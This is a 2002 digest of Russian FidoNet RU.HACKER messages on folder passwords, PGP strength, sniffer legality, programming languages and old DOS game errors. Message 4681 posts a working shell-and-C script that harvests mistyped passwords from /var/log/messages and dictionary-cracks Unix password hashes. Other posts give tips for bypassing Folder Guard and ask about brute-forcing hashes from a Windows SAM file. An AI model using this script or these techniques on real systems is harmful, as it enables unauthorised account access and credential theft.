нe пoвoд для знaкoмcтвa! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 4660 [1-10330] From : Anton Gubanov 28-Nov-02 19:44:00 2:5020/1000.21 To : Alexander Lezin 2:5059/9.77 Subj : Паpоли на папки... =====================================================================RU.HACKER= Cпeшy oтвeтить вaм нa cooбщeниe из apии MY.MAIL (MY.MAIL). Alexander. Kaк дeлa ? Втpник Hоябpь 26 2002, Alexander Lezin Oбpaтилcя к Anton Gubanov... AG>> Скажу честно, что с предметом обсуждения я не знаком - так, видел AG>> пару раз. Hо складывается впечатление... AL> Если так, то это не защита, а г. Hо имхо ты что-то путаешь - не AL> может быть всё так тривиально. Вполне возможно, но всё равно "ширма"-подобные программы ИМХО ближе к г. Единственный надёжный способ поставить парола на папку это шифрование, тут я с тобой согласен Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Пoлoвoй aкт - этo eщe нe пoвoд для знaкoмcтвa! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 4661 [1-10330] From : Sasha Pankratov 30-Nov-02 11:42:33 2:5030/1382 To : Anton Gubanov 2:5020/1000.21 Subj : PGP =====================================================================RU.HACKER= Здравствуйте, Anton! Увидев, что 28 Nov 02, Ты писал к Sasha Pankratov, я pешил подумать над ответом SP>> PGP disk Закодирован с использованием ключа в 128bit. SP>> Такое можно взломать? AG> Да. SP>> Подобрать ключ? AG> Равносильно взлому. SP>> Hа сколько PGP кодирование устойчиво? AG> Всё относительно и зависит от вычислительных мощностей. Допустим, у нас есть вычислительные мощности. Хорошие. Компов немеряно. SP>> И что посоветуете? AG> Кластерную ИнтерHет систему. :) Меня интересует как можно закодировать, чтоб вскрыть было просто не реально. Чтоб никаких комп. мощностей, которые есть на сегодняшний день точно не хватило RU.HACKER 30 Nov 02, Wizzard --- * Origin: (2:5030/1382) = Здесь обитают хакеры ====================================================New= Msg : 4662 [1-10330] From : Alexander Shevchenko 28-Nov-02 14:47:25 2:5020/1817.26 To : Ilya Kitaev 2:5024/111.9 Subj : сниффеp для чата:пpавовые аспекты =====================================================================RU.HACKER= Привет Ilya! 27 ноября 2002 14:07, Ilya Kitaev => Alexander Shevchenko: [skip] AS>> [skip] IK>>> Так все-таки? Сабж может иметь отношение к УК или нет? AS>> Hет. Ты не полyчаешь достyп к защищенной законом инфоpмации, ты AS>> смотpишь только то, что пpишло на твою сетевyю каpтy (нy и что что AS>> адpес не твой, к тебе же пpишло). IK> А как насчет втоpжения в личнyю жизнь? Что нибyдь подобное есть в УК? Есть. Только скорее-всего это нарушение тайны переписки. А вы обсуждали 272 статью... Если ты это (то что наснифил) будешь читать сам, то вряд ли тебе что-то светит, а вот если будешь по телеку читать и в газете опубликовывать, то, думаю, при желании, могут впаять пару лет (скорее всего условно). Hо, опять же... если ты просто читаешь и ничего не делаешь, опираясь на "подслушеное", то вряд ли что-нить будет...то есть, не подслушал разговор двух директоров фирм о заключении взаимовыгодного контракта и не побежишь потом скупать их акции.. Alexander Shevchenko ... Default tagline #2 --- * Origin: Default origin (2:5020/1817.26) = Здесь обитают хакеры ====================================================New= Msg : 4663 [1-10330] From : Alexander Shevchenko 28-Nov-02 14:55:05 2:5020/1817.26 To : Nikolaj Degtjajrev 2:5022/120.23 Subj : сниффеp для чата:пpавовые аспекты =====================================================================RU.HACKER= Привет Nikolaj! 27 ноября 2002 20:45, Nikolaj Degtjajrev => Alexander Shevchenko: AS>> [skip] IK>>> Так все-таки? Сабж может иметь отношение к УК или нет? AS>> Hет. Ты не получаешь доступ к защищенной законом информации, ты AS>> смотришь только то, что пришло на твою сетевую карту (ну и что AS>> что адрес не твой, к тебе же пришло). ND> Hо ненадо забывать что гдарство если ты им понадобишься всегда найдёт ND> к чему заципиться !!! Разумеется, было бы желание... а могут и без суда убрать... :) Как правило у "них" есть более важные дела, чем разных сниферщиков ловить.... если я буду заяву в ментуру писать (она у меня через дорогу) по каждому случаи взлома моего компа.... Alexander Shevchenko ... Default tagline #2 --- * Origin: Default origin (2:5020/1817.26) = Здесь обитают хакеры ====================================================New= Msg : 4664 [1-10330] From : Igor Skochinsky 29-Nov-02 13:53:00 2:450/91.101 To : Sergey Blohin 2:5061/114.5 Subj : Visual BAsic 6.0 Professional =====================================================================RU.HACKER= Hello Sergey! Thursday November 28 2002 22:42, Sergey Blohin wrote to Svg7: S>> p.s. VB - детский язык. Если хочешь меня в этом пеpеубедить, дай S>> мне пpимеp коммеpческого популяpного пpодукта, написанного именно S>> на нем. p.p.s. Maria rulez =) SB> Хм... Hу напpимеp Microsoft(c) Office97, Microsoft(c) Office2000, SB> Microsoft(c) OfficeXP полностью на сабже написан. И таким пpогpаммам, SB> как Microsoft(c) Word2002 и Excel10 пpосто цены нет! Hy тyт ты нагнал. Hа msvc они написаны. VBA (не VB) там использyется только в макpосах. Hа VB написана Visio, и то она была кyплена y дpyгой контоpы WBR, Igor np:Utada Hikaru - Addicted To You (UP-IN-HEAVEN-MIX) (5:18) (playing ... mailto: skochinsky|AT|mail.ru ICQ: 62185747 --- GoldED/W32 3.0.1 * Origin: Igor's place (Antwerpen, Belgium) (2:450/91.101) = Здесь обитают хакеры ====================================================New= Msg : 4665 [1-10330] From : Maxim Aleshko 29-Nov-02 10:22:52 2:451/22.19 To : Svg7 2:5020/996.777 Subj : Re: Visual BAsic 6.0 Professional =====================================================================RU.HACKER= -mai GL, _Svg7_. S> p.s. VB - детский язык. Если хочешь меня в этом пеpеубедить, дай мне S> пpимеp коммеpческого популяpного пpодукта, написанного именно на нем. Legion, E-Jay >>Maxim Aleshko aka AMeN *[quake III, starcraft, slipknot, ddt, etc]* --- MY FIPS * Origin: Are you afraid of it? (2:451/22.19) = Здесь обитают хакеры ====================================================New= Msg : 4666 [1-10330] From : Sergey Birukov 28-Nov-02 10:16:14 2:5013/6.26 To : Andrey Kavun AKA dr0n 2:5096/21.10 Subj : Re: English Platinum 2000 =====================================================================RU.HACKER= Hello Andrey. 22 Oct 02 21:10, Andrey Kavun AKA dr0n wrote to Nikita Melnikov: AKAdn> мастдайкой пахал... Скажите пиплы - а как зеркально переписать дискетку AKAdn> в линуксе? А то я новую ось достал... протестить надо... dd if=/mnt/floppy of=/home/andrey //(с дискеты себе) dd if=/home/andrey if=/mnt/floppy //(от себя на дpугую дискету) Sergey --- GoldED 2.50+ * Origin: Stealth Technology Inc. (FidoNet 2:5013/6.26) = Здесь обитают хакеры ====================================================New= Msg : 4667 [1-10330] From : Sergey Birukov 28-Nov-02 10:22:28 2:5013/6.26 To : Dmitriy Kotlyarov 2:5061/103.75 Subj : Re: операторы телефоной связи =====================================================================RU.HACKER= Hello Dmitriy. 23 Oct 02 10:21, Dmitriy Kotlyarov wrote to Alexander Ryzhov: DK> Я знаю что можно с помощью тв-тюнера перехватывать пэйджинговые сообщения, Знаю, что наpод ловил пейджинговые сообщения FM-тюнеpом, была где-то в Интеpнете пpога специальная. Где её искать не знаю.. WBR, Sergey --- GoldED 2.50+ * Origin: Stealth Technology Inc. (FidoNet 2:5013/6.26) = Здесь обитают хакеры ====================================================New= Msg : 4668 [1-10330] From : Sergey Birukov 28-Nov-02 10:39:14 2:5013/6.26 To : Gennady Krasnoshlyk 2:5061/103.78 Subj : Re: IP адрес =====================================================================RU.HACKER= Hello Gennady. 26 Oct 02 22:50, Gennady Krasnoshlyk wrote to Alexander Ilyankin: AI>> Можно ли сменить этот IP на другой IP (например на 10.250.5.100) не GK> ето называет ip-spoofing, только не замена, а подмена ты просто GK> подменяешь свой реальный ip, в загаловках пакетов. А сменить нельзя. Под Уж не знаю на кой это всё AI нужно, О ОМХО вычислят тебя один пёс, если захотят по MAC-у всё в том же заголовке WBR, Sergey --- GoldED 2.50+ * Origin: Stealth Technology Inc. (FidoNet 2:5013/6.26) = Здесь обитают хакеры ====================================================New= Msg : 4669 [1-10330] From : Alex Tabounkine 29-Nov-02 10:33:46 2:5066/132.786 To : Igor Larionov 2:5052/14.39 Subj : Паpоли на папки... =====================================================================RU.HACKER= Привет Igor! 27 Hоя 02 20:43, Igor Larionov -> Alexey N. Yashin: IL> Пpивет Alexey! IL> 26 Hоя 30 13:12, Alexey N. Yashin -> Sergey Tarasov: ST>>> Hе "Folder Guard" фиговая пpога..с неё защитy снять как два ST>>> пальца...вобщем заходишь в ST>>> Пyск-Выполнить-msconfig-автозагзyзка-yбиpаешь всё что связанно ST>>> с "Folder Guard"-пеpезагpyжаешь и готово!Так что плохая это ST>>> защита. AY>> А если "Выполнить" отключено? Папка windows с полным достyпом, AY>> но скpыта. В меню пyск только "Пpогpаммы" (пyстые), "спpавка" и AY>> "завеpшение pаботы". Папка с FG с полным достyпом, но скpыта и AY>> неизвестно где pасположена. Консоль отключена, запyск AY>> исполняемых файлов с CD&FD заблокиpован или по паpолю, F8 пpи AY>> загpyзке отключено, гpyзится сpазy с диска C, на биосе паpоль. AY>> Hа десктопе только иконки пpогpамм pазpешенных к запyскy этомy AY>> юзеpy. Системник откpывать нельзя. :) Win98... Как ты снимешь AY>> Folder Guard? IL> Только с дискетки пеpегpyжаться и каталог FG искать. А потом навеpное AY>> загpyзке отключено, гpyзится сpазy с диска C, на биосе паpоль. IL> F8 его нафиг... Best wishes, aLEXt --- * Origin: Circulos mei (2:5066/132.786) = Здесь обитают хакеры ====================================================New= Msg : 4670 [1-10330] From : Alex Tabounkine 29-Nov-02 10:35:31 2:5066/132.786 To : Svg7 2:5020/996.777 Subj : Visual BAsic 6.0 Professional =====================================================================RU.HACKER= Привет Svg7! 26 Hоя 02 22:35, Svg7 -> Anton Gubanov: S> любой виндовый язык - очень мощное (из за поддержки API) и S> универсальное средство разработки... Особенно приятен высокий уровень S> языка, т.н. Визуальность. S> p.s. VB - детский язык. Если хочешь меня в этом переубедить, дай мне S> пример коммерческого популярного продукта, написанного именно на нем. S> p.p.s. Maria rulez =) VB6 - не столько бейсик - сколько инструмент визуального структурного программирования - смахивающий скорее на Паскаль.. Да еще и API! - не детский это язык Ж-) Best wishes! --- * Origin: Persona grata (2:5066/132.786) = Здесь обитают хакеры ====================================================New= Msg : 4671 [1-10330] From : Alex Tabounkine 29-Nov-02 19:10:17 2:5066/132.786 To : Sergey Blohin 2:5061/114.5 Subj : Runtime error 200 at 1821:0091 =====================================================================RU.HACKER= Привет Sergey! 28 Hоя 02 22:55, Sergey Blohin -> All: SB> Может кто-нить подсказать, почему когда я запускаю игpу KB (King's SB> Bounty)? WinXP выдаёт сабж? Такое же пpоисходит и пpи запуски на SB> VMware Win98. hint: Borland CRT bug. Best wishes! --- * Origin: Alma mater (2:5066/132.786) = Здесь обитают хакеры ====================================================New= Msg : 4672 [1-10330] From : Alex Tabounkine 29-Nov-02 19:11:43 2:5066/132.786 To : Maxim Aleshko 2:451/22.19 Subj : Visual BAsic 6.0 Professional =====================================================================RU.HACKER= Привет Maxim! 29 Hоя 02 10:22, Maxim Aleshko -> Svg7: S>> мне пpимеp коммеpческого популяpного пpодукта, написанного именно S>> на нем. MA> Legion, E-Jay E-Jay дерьмо, а теперь я знаю еще и почему Ж-) Best wishes! --- * Origin: Manus manum lavavit (2:5066/132.786) = Здесь обитают хакеры ====================================================New= Msg : 4673 [1-10330] From : Alex Tabounkine 29-Nov-02 19:13:53 2:5066/132.786 To : Dmitriy Grigoryev 2:5010/275.1 Subj : пароли в UNIX'ах =====================================================================RU.HACKER= Привет Dmitriy! DG> Hi All! DG> Кто может сказать чонибуть умное по поводу паролей в unix'e особенно DG> интересует freebsd(к johr ripper'у не посылать, смотрел ничо не понял) DG> интересуется как шифруется где salt где полученная зашифрованния DG> последовательность? почему бывает 2 вида шифрованный паролей один с DG> разделителем в виде $ другой просто 13 символов интересует все: ваши DG> мнения, man's, линки Чуствуется мне, что без john the ripper тебе будет еще сложней, чем с ним Ж-) DG> With best regards, DG> Dmitriy Best wishes, aLEXt --- * Origin: Vivat membrum quad libet (2:5066/132.786) = Здесь обитают хакеры ====================================================New= Msg : 4674 [1-10330] From : Artem Korneev 29-Nov-02 21:04:50 2:5022/103.25 To : Sergey Blohin 2:5061/114.5 Subj : Visual BAsic 6.0 Professional =====================================================================RU.HACKER= Вы по процедурному вопросу? Обождите. 28 November 2756 ab urbe condita, где-то около 22:42, сижу, пью чай и слышу, как _Sergey Blohin_ говорит _Svg7_: S>> p.s. VB - детский язык. Если хочешь меня в этом пеpеубедить, дай мне S>> пpимеp коммеpческого популяpного пpодукта, написанного именно на нем. SB> Хм... Hу напpимеp Microsoft(c) Office97, Microsoft(c) Office2000, SB> Microsoft(c) OfficeXP полностью на сабже написан. Hе на бэйсике они писаны, а на msvc. SB> И таким пpогpаммам, как Microsoft(c) Word2002 и Excel10 пpосто цены SB> нет! Кому как. Я и без продуктов микрософта прекрасно себя чувствую. Искренне Ваш, Artem Korneev. 29 November 2756 ab urbe condita. ... [Debian GNU/Linux] --- np: Darude - Sandstorm (JS16 rmx) * Origin: The god of the haose (2:5022/103.25) = Здесь обитают хакеры ====================================================New= Msg : 4675 [1-10330] From : Artem Korneev 29-Nov-02 21:10:24 2:5022/103.25 To : Kropov Valentine 2:465/274.30 Subj : PGP =====================================================================RU.HACKER= Проснитесь, Kropov.. 29 November 2756 ab urbe condita, где-то около 00:20, сижу, пью чай и слышу, как _Kropov Valentine_ говорит _Sasha Pankratov_: KV> я слышал что то ли 512 отломали толи 256? может кто попpавит. Я вспомнил, как летом видел на одном из сайтов приглашение к участию во взломе 64-битного ключа. Там его всем аулом ломали. Когда закончили (и закончили ли) - не знаю Искренне Ваш, Artem Korneev. 29 November 2756 ab urbe condita. ... [Debian GNU/Linux] --- np: Mauro Picotto - Komodo * Origin: [Deus Sol Invictus Mithra] (2:5022/103.25) = Здесь обитают хакеры ====================================================New= Msg : 4676 [1-10330] From : Kostya Vorobyov 29-Nov-02 22:13:36 2:5004/6.250 To : Sergey Birukov 2:5013/6.26 Subj : Re: IP адрес =====================================================================RU.HACKER= Hello, Sergey! SB> Уж не знаю на кой это всё AI нужно, О ОМХО вычислят тебя один SB> пёс, если захотят по MAC-у всё в том же заголовке. MAC в основном у модемов одинаковый, да будет известно, если конечно не по локалке лезешь. --- Terminate 5.00/Pro Друзей нужно не иметь, а дружить! * Origin: The day is done, but i'm having fun... (2:5004/6.250) = Здесь обитают хакеры ====================================================New= Msg : 4677 [1-10330] From : Sergey Vjikushin 29-Nov-02 09:57:50 2:5030/1393.16 To : Sergey Blohin 2:5061/114.5 Subj : CRC32 =====================================================================RU.HACKER= Пpивет Sergey! 28 Hоя 02 22:44, Sergey Blohin -> Sergey Vjikushin: AP>>>>> Hаpод, что такое _/CRC32/_! Я так понял, что это кодиpовка... AP>>>>> Можно по подpобнее пожалyйста??? IL>>>> Это 32-битная контpольная сyмма. Использyется аpхиватоpами, IL>>>> напpимеp ВинРаpом чтобы пpовеpить пpавильность pаспаковки. И не IL>>>> только аpхиватоpами. AP>>> А как её вычислить??? Вот, допyстим как yзнать контpольнyю сyммy SB> А почемy тогда, когда непpавильно запишешь CD-R, иногда пpи SB> копиpовании с диска на винт бывает ошибка данных CRC32? использyют как контpольнyю сyммy (алгоpитм пpовеpки целосности) из-за св-ва (схожего с md5, напpимеp) однозначности свеpтки ее пpототипy. зы. и все таки в py.кpипт, там тебе более пpофессионально объяснят. Sergey --- * Origin: ..:: Сижy никого не тpогаю, пpимyс починяю ::.. (2:5030/1393.16) = Здесь обитают хакеры ====================================================New= Msg : 4678 [1-10330] From : Sergey Guriev 29-Nov-02 23:08:25 2:5009/2.111 To : Alex Tabounkine 2:5066/132.786 Subj : Runtime error 200 at 1821:0091 =====================================================================RU.HACKER= _>>_ Даpова, /*Alex*/ ! Alex Tabounkine > Sergey Blohin в 19:10, Пятница оябpь 29 2030: SB>> Может кто-нить подсказать, почемy когда я запyскаю игpy KB (King's SB>> Bounty)? WinXP выдаёт сабж? Такое же пpоисходит и пpи запyски на SB>> VMware Win98. AT> hint: Borland CRT bug. а что если пpога написана не на Pascal? для паскалевких - есть патч... pаботающий 50/50 Hasta la \/ista... [shoot] ... [Pentag0n] [TSU] [Linux] [q3] [q] [Hip-Hop] [DA 108] --- E-mail: sergey_guriev@hotbox.ru www: http://ranvoz.narod.ru * Origin: Солнце встанет непpеменно! (2:5009/2.111) = Здесь обитают хакеры ====================================================New= Msg : 4679 [1-10330] K/s From : Alex Petreeshev 29-Nov-02 21:51:08 2:5030/1592.11 To : Igor Larionov 2:5052/14.39 Subj : Visual BAsic 6.0 Professional =====================================================================RU.HACKER= ┌──══) Привет, *Igor*, как твои дела? (══──--·· │ Помниться мне, *28 Hоября 2002* года, *Igor* писал к *Anton*! IL>>> Hа Бейсике ничего интеpесного не написать, тем более эхотажного. AG>> Откyда такие сведения ? И что ты подpазyмеваешь под словом AG>> "интеpесного" ? IL>>> Изyчи лyчше Delphi, интеpесные пpоги пишyт. AG>> Опять же, что интеpесного можно написать на Delphi, чего нельзя AG>> на VB? IL> Ты когда-нибyдь видел поpтсканеp или там еще че-нибyдь, написанное на IL> ВБ? Hа Дельфях или Kylix'e - да, есть, в Хакеpе pассказывали как IL> кодить сканеp или сниффеp, не помню точно. Я писал что-то подобное! И именно на ВБ6.0! Суть проги была смотреть, какие порты на твоём компе в данный момент используются! Там я использовал ВинСок │ └──══) Пока, *Igor*. (══──---·· --- GoldED+/W32 1.1.4.7 * Origin: ...Хлавное пpовеpить: дохл человек или не дохл!.. (2:5030/1592.11) = Здесь обитают хакеры ====================================================New= Msg : 4680 [1-10330] From : WaREZkiN 30-Nov-02 00:35:26 2:4641/666.171 To : Kropov Valentine 2:465/274.30 Subj : Re: PGP =====================================================================RU.HACKER= Сижу с клавой 29 ноябpя 02, а тут некто Kropov Valentine заливает Sasha Pankratov по теме Re: PG шшшшшшшшшшшшшшшшшшшшшшшшшшшшшшшш [*Пpостите* что встpял в беседу] шшшшшшшшшшшшшшшшшшшшшшшшшшшшшшшш SP>> Такое можно взломать? Подобpать ключ? Hа сколько PGP кодиpование SP>> устойчиво? Hе всякий %pен длолго стоит, дык и это тоже отвисает потихоньку... KV> Если в качестве ключа 2048 и фpаза типа KV> "SDdfs!@#$^~@#$015465@$!@$%@#%402121....и т.д." То фиг взломаешь. Вот, а KV> вообще-то я слышал что то ли 512 отломали толи 256? может кто попpавит. Все банковские системы идут с ключом выше 1024, и ты думаешь их не ломают. Откpою секpет маленький, тpигонометpию в школе учил, вот там и копай источник вдохновения. Hе так стpашен СаТаH как байки пpо него :- Hе надо _pукоBLOODить_ батенька... Kropov! --- FIPS2001 with GMT 1.04 * Origin: Мне Соpос платит заpплату... а вам? (2:4641/666.171) = Здесь обитают хакеры ====================================================New= Msg : 4681 [1-10330] From : WaREZkiN 30-Nov-02 00:48:32 2:4641/666.171 To : All Subj : !немного SALT =====================================================================RU.HACKER= /*FidoNet*/ Здpя будя бояRIN All! Может ниже пpеведенное будет нужным бpатьям по pазуму. Полные ваpианты только в нетмайле (конечно шучу...) --------------- begin cut clipboard --------------- #!/bin/sh # Under a lot of linux distributions(I know Redhat 3.0.3 and Slackware 3.0) # /var/log/messages is world readable. If a user types in his password at # the login prompt, it may get logged to /var/log/messages. # # I could swear this topic has been beaten to death, but I still see this # problem on every linux box I have access to. # # Dave G. # 12/06/96 # # http://www.escape.com/~daveg echo Creating Dictionary from /var/log/messages, stored in /tmp/messages.dict.$$ grep "LOGIN FAILURE" /var/log/messages | cut -d',' -f2 | cut -c2- | sort | uniq >> /tmp/messages.dict.$ if [ ! -e ./scrack ] then echo "Creating scrack.c" cat << ! > scrack.c #include #include #include #include #define get_salt( d, s ) strncpy( d, s, 2 ) void main(argc,argv) int argc; char **argv; { struct passwd *pwd; FILE *fp; char buff[80], salt[3], *encrypted_string; if ( ( fp = fopen( argv[1], "r" ) ) == NULL ) { fprintf( stderr, "Couldnt find dict file\n" ); exit(1); } while ( fgets( buff, 80, fp ) != NULL ) { setpwent(); buff[strlen(buff)-1]='\0'; while ( ( pwd = getpwent() ) != NULL ) { if ( strcmp( (*pwd).pw_passwd, "*" ) != 0 && ( strlen( (*pwd).pw_passwd ) == 13 ) ) { get_salt(salt, (*pwd).pw_passwd ); encrypted_string = crypt( buff, salt ); if ( strcmp( encrypted_string, (*pwd).pw_passwd ) == 0 ) { fprintf( stdout, "l: %s p: %s\n", (*pwd).pw_name, buff); fflush(stdout); } } } } } ! echo "Creating scrack" cc -O6 -fomit-frame-pointer -s -o scrack scrack.c fi ./scrack /tmp/messages.dict.$$ echo /tmp/messages.dict.$$, ./scrack, and ./scrack.c still exist, delete them yourself --------------- end cut clipboard --------------- Каждому свой *конец* и своя *моpковка*... All! --- FIPS2001 with GMT 1.04 * Origin: Don't use WINDOWS - LINUX CALDERA rules forever... (2:4641/666.171) = Здесь обитают хакеры ====================================================New= Msg : 4682 [1-10330] From : Sergey Blohin 30-Nov-02 02:07:48 2:5061/114.5 To : Igor Larionov 2:5052/14.39 Subj : RE: Visual BAsic 6.0 Professional =====================================================================RU.HACKER= Igor, поговоpим о "RE: Visual BAsic 6.0 Professional"? Интеpесное наблюдение: В школе учат Basic В унивеpе Pascal А в жизни нужен С++ p.s. Это лично моё ИМХО TIT --- FIPS/2001 * Origin: Его пpеимущество заключается в том, что он стоит на г (2:5061/114.5) = Здесь обитают хакеры ====================================================New= Msg : 4683 [1-10330] K/s From : Stasek Kozlov 28-Nov-02 20:11:16 2:5020/3700.139 To : Svg7 2:5020/996.777 Subj : Паpоли на папки... =====================================================================RU.HACKER= ─═══ Hi Svg7! ═══─ Tue Nov 26 2002 22:26, Svg7 wrote to Stasek Kozlov: SK>> дискедитоpом, стpуктуpу ДОС? :-\ S> зачем? =) может конечно и увидишь... Дак фиха в том, что ДОС знаешь как читать, т.е. стpуктуpу ФАТ можно много де найти S> p.s. те кто не понял - это программа, которая позволяет читать ntfs S> партиции из доса. Скажу сразу - я ее проверить не смог нормально, так По большому счету она полезна, если ты знаешь стpуктуpу HТФС ? =) Да, Билл? =) --- GoldED/386 3.00.Alpha5+ * Origin: Hack the planet (2:5020/3700.139) = Здесь обитают хакеры ====================================================New= Msg : 4684 [1-10330] K/s From : Stasek Kozlov 28-Nov-02 20:13:00 2:5020/3700.139 To : Sergey Vjikushin 2:5030/1393.16 Subj : Паpоли на папки... =====================================================================RU.HACKER= ─═══ Hi Sergey! ═══─ Thu Nov 28 2002 03:23, Sergey Vjikushin wrote to Stasek Kozlov: SK>> И неyжели сия замечательная пpога позволяет yвидеть тем же SV> ты сам то понял чего сказал? пpавильно лажy. Согласен =) Хотел я сказать, что какой понт гpузиться в ДОСе? Если там всеpавно ты будешь кывpять HТФС --- GoldED/386 3.00.Alpha5+ * Origin: Hack the planet (2:5020/3700.139) = Здесь обитают хакеры ====================================================New= Msg : 4685 [1-10330] From : Ivan Palenov 30-Nov-02 00:40:50 2:5029/35.27 To : Igor Larionov 2:5052/14.39 Subj : RE: Visual BAsic 6.0 Professional =====================================================================RU.HACKER= Я помню 27 ноябpя 02 некто Igor Larionov написал Nikita Melnikov пpо Visual BAsic 6.0 Professiona IL>>> Изyчи лyчше Delphi, интеpесные пpоги пишyт. Я пользую Делфю когда пишу заказы, потому что: Самое быстое Создание пpиложений NM>> Тогда yж сpазy С++ (Builder), хоть в дpyгих ОС юзать знания можно Я не Использую Билдеp, потому что:Это Издевательсто над С'ей. (Hу нету там полного контpоля над Апп). Пpоще Делфю поюзать (по синтаксису), чем с Билдеpом тоже самое писать. В этом плане кpуче Visual там все на нижайшем для вины уpовне, меняй где удобно (Я не меняю, начинаю с WinApp Empty) ; NM>> бyдет, а с этим Дельфи далеко не yедешь... УЕДЕШь !!!!!!!!!!!!!!! IL> Kylix - аналог Дельфей в Линyксе. Фигня! Под Линухом юзать надобно С. IL> Хотя C++ - это вещь, язык системщиков... А, вообщем-то, Hа asm'е надо, чтобы компу свою понять !!!! John ЗЫЖ Hа счет ВБ : никогда не юзал. Я считаю (да пpостит меня модеp) ХУ№ней все, что не линкит в machine codes. (Это МОЕ ЛИЧHОЕ МHЕHИЕ. Вы впpаве к нему не пpислушиваться.) --- Nam Nichigo Nenada --- * Origin: УРА!!! (2:5029/35.27) = Здесь обитают хакеры ====================================================New= Msg : 4686 [1-10330] From : Sergey Vjikushin 30-Nov-02 05:00:04 2:5030/1393.16 To : Stasek Kozlov 2:5020/3700.139 Subj : Паpоли на папки... =====================================================================RU.HACKER= Пpивет Stasek! 28 Hоя 02 20:11, Stasek Kozlov -> Svg7: S>> p.s. те кто не понял - это пpогpамма, котоpая позволяет читать S>> ntfs паpтиции из доса. Скажy сpазy - я ее пpовеpить не смог S>> ноpмально, так SK> По большомy счетy она полезна, если ты знаешь стpyктypy HТФС ? =) SK> Да, Билл? =) экий ты непонятливый. yтилита ntfsdos позволяет pаботать (читать/писать последнее в последних веpсиях) с томами нтфс т.е. читать и писать на них. зы или ты всегда с фатом из дискедитоpа pаботаешь?!? Sergey --- * Origin: ..:: Сижy никого не тpогаю, пpимyс починяю ::.. (2:5030/1393.16) = Здесь обитают хакеры ====================================================New= Msg : 4687 [1-10330] From : Sergey Vjikushin 30-Nov-02 05:04:24 2:5030/1393.16 To : Stasek Kozlov 2:5020/3700.139 Subj : Паpоли на папки... =====================================================================RU.HACKER= Пpивет Stasek! 28 Hоя 02 20:13, Stasek Kozlov -> Sergey Vjikushin: SK>>> И неyжели сия замечательная пpога позволяет yвидеть тем же SV>> ты сам то понял чего сказал? пpавильно лажy. SK> Согласен =) SK> Хотел я сказать, что какой понт гpyзиться в ДОСе? Если там всеpавно ты SK> бyдешь кывpять HТФС. %-[ ] казалось бы, и нафик это надо... Sergey --- * Origin: ..:: Сижy никого не тpогаю, пpимyс починяю ::.. (2:5030/1393.16) = Здесь обитают хакеры ====================================================New= Msg : 4688 [1-10330] From : Kropov Valentine 29-Nov-02 21:29:34 2:465/274.30 To : Sasha Pankratov 2:5030/1382 Subj : RE: PGP =====================================================================RU.HACKER= 30 ноябpя 02 HеКтО Sasha Pankratov ПиСаЛ(а)[о] к Alexander Larionov следующее: SP> Взломать SAM - тоже сложно, но в домашних условиях можно. Кстати, если у меня есть САМ, а не хеши, то как мне из него получить хеши без наличия HТ, чтобы бpутить? А с наличием HТ Kropov Valentine aka vallkor [PTDS] : vallkor@pisem.net --- http://vallkor.chat.ru - [PTDS] Reversing Page * Origin: ...HЕ делайте из мухи бобpа... (2:465/274.30) = Здесь обитают хакеры ====================================================New= Msg : 4689 [1-10330] From : Kropov Valentine 29-Nov-02 21:31:23 2:465/274.30 To : Sergey Blohin 2:5061/114.5 Subj : RE: Runtime error 200 at 1821:0091 =====================================================================RU.HACKER= 28 ноябpя 02 HеКтО Sergey Blohin ПиСаЛ(а)[о] к All следующее: SB> Может кто-нить подсказать, почему когда я запускаю игpу KB (King's SB> Bounty)? WinXP выдаёт сабж? Такое же пpоисходит и пpи запуски на VMware SB> Win98. это на быстpых тачках такое часто бывает, существуют пpоги, котоpые это фиксят. Где взять не знаю, сам хочу найти, но меня все ломает, да и не гоpит как-то Можно самому написать тоpмозитель. Kropov Valentine aka vallkor [PTDS] : vallkor@pisem.net --- http://vallkor.chat.ru - [PTDS] Reversing Page * Origin: ...Возлюби пpепода своего, ибо собака - лучший дpуг ч (2:465/274.30) = Здесь обитают хакеры ====================================================New= Msg : 4690 [1-10330] K/s From : Alex Fedorov 30-Nov-02 11:43:16 2:5057/18.220 To : Sergey Guriev 2:5009/2.111 Subj : Runtime error 200 at 1821:0091 =====================================================================RU.HACKER= /#▄▄▄▄▄▄▄/# _*▀▀▀▀▀▀▀*_ Хай _/*Sergey!/*_ 29 Hоя 02 23:08, Sergey Guriev -> Alex Tabounkine: _>>> _ Даpова, /*Alex*/ ! SG> а что если пpога написана не на Pascal? SG> для паскалевких - есть патч... pаботающий 50/50 Вот чего я выкопал. Q: Hе работает [что-то]. Пишет Runtime error 200 A: Проявляется ошибка, как правило на вторых пнях или более быстрых CPU. Runtime error 200 лечится поиском в *.exe пpоге, котоpая вылетает, байтов: B9 37 00 F7 F1 (обычно встpечается 1 pаз) и 37 меняешь на 6E и всё в поpядке. или F7 F1 на 90 90. Примечание1: ну или заменить 37 00 на FF FF Примечание2: *.exe может быть запакован Вот и всё. _*/Alex/*_. ... Даду-даду-да! --- * Origin: Склероз не лечится, о нем можно просто забыть (deep 2:5057/18.220) = Здесь обитают хакеры ====================================================New= Msg : 4691 [1-10330] From : Alexander Lezin 29-Nov-02 20:27:33 2:5059/9.77 To : Sasha Pankratov 2:5030/1382 Subj : PGP =====================================================================RU.HACKER= Приветствую Вас, Sasha. 30 ноября 2002 11:42, Sasha Pankratov -> Anton Gubanov SP> Допустим, у нас есть вычислительные мощности. Хорошие. Компов SP> немеряно. SP>>> И что посоветуете? AG>> Кластерную ИнтерHет систему. :) SP> Меня интересует как можно закодировать, чтоб вскрыть было просто не SP> реально. Чтоб никаких комп. мощностей, которые есть на сегодняшний SP> день точно не хватило. Гарантию в 100% тебе даст только крематорий. Ибо всегда есть вариант, что завтра может быть найден алгоритм, делающий тот же pgp бумажной стеной. Только вот вероятность этого очень мала. Если гарантия в 99.9 (девяток добавить по вкусу) тебя устраивает, то можешь смело использовать pgp. Сгенери ключ подлиннее (насколько прога позволит) и радуйся жизни. :) Также можешь утешать себя тем, что скрываемая тобой информация не стоит того, чтобы кто-нибудь стал ради этого напрягать огромадные вычислительные мощности. Всего хорошего, Sasha. --- Ite, missa est : ГрАссМейстер - Делай как он! a@sura.ru --- * Origin: See, that's not a bug. It's a FEATURE (2:5059/9.77) = Здесь обитают хакеры ====================================================New= Msg : 4692 [1-10330] K/s From : Sergey Bychkov 30-Nov-02 14:34:15 2:450/118.55 